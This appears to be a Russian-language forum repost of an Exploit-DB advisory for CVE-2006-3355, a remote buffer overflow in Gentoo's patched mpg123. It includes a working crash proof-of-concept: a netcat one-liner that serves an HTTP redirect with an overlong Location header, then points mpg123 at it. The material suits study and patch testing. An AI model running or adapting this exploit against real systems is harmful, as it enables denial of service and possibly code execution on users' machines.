Exploit Gentoo-Specific MPG123 - URI Remote Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28160
Проверка EDB
  1. Пройдено
Автор
HORST SCHIRMEIER
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2006-3355
Дата публикации
2006-07-03
Код:
source: https://www.securityfocus.com/bid/18794/info

The mpg123 application is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

This issue may allow remote attackers to execute arbitrary machine code in the context of the affected application.

This issue is specific to a patch applied to the Gentoo Linux version of mpg123.

The following commands are sufficient to demonstrate this issue by crashing affected applications:

( echo -ne "HTTP/1.1 302 Found\r\nLocation: "
echo -ne "http://fooooooooooooooooooooooooooooooooooooooooooooooooo/\r\n\r\n"
)| nc -lp 8080 &

mpg123 http://localhost:8080/
 
Источник
www.exploit-db.com

Похожие темы